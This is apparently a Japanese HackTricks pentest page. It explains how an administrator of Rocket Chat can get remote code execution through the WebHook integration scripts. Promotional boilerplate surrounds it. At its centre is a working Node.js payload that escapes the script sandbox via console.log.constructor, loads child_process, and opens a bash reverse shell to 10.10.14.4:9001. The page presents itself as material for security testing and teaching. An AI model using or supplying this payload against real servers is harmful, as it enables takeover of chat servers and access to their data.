Rocket Chat

htARTE（HackTricks AWS Red Team Expert） からAWSハッキングをゼロからヒーローまで学ぶ！

HackTricks をサポートする他の方法:

HackTricks で企業を宣伝したいまたは HackTricks をPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
公式PEASS＆HackTricksスワッグを入手する
The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
**💬 Discordグループ**に参加するか、telegramグループに参加するか、Twitter 🐦で @carlospolopmをフォローする
ハッキングトリックを共有するために、HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出する

Websec | Uw Cybersecurity Specialist

RCE

Rocket Chat内で管理者であればRCEを取得できます。

Integrations に移動し、New Integration を選択し、Incoming WebHook または Outgoing WebHook を選択します。
/admin/integrations/incoming

ドキュメントによると、両方ともES2015 / ECMAScript 6（基本的にJavaScript）を使用してデータを処理します。そのため、nodejsのようなJavaScript用のrev shellを取得しましょう。

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

WebHookの設定（チャンネルと投稿者名が存在する必要があります）：

WebHookスクリプトの設定：

変更を保存
生成されたWebHook URLを取得：

curlを使用して呼び出し、rev shellを受け取るはずです

Websec | Uw Cybersecurity Specialist

htARTE（HackTricks AWS Red Team Expert）でAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法：

HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
公式PEASS＆HackTricksスワッグを入手する
The PEASS Familyを発見し、独占的なNFTsコレクションを見つける
**💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
HackTricksおよびHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有する。

PreviousPython NextSpecial HTTP headers

Last updated 3 days ago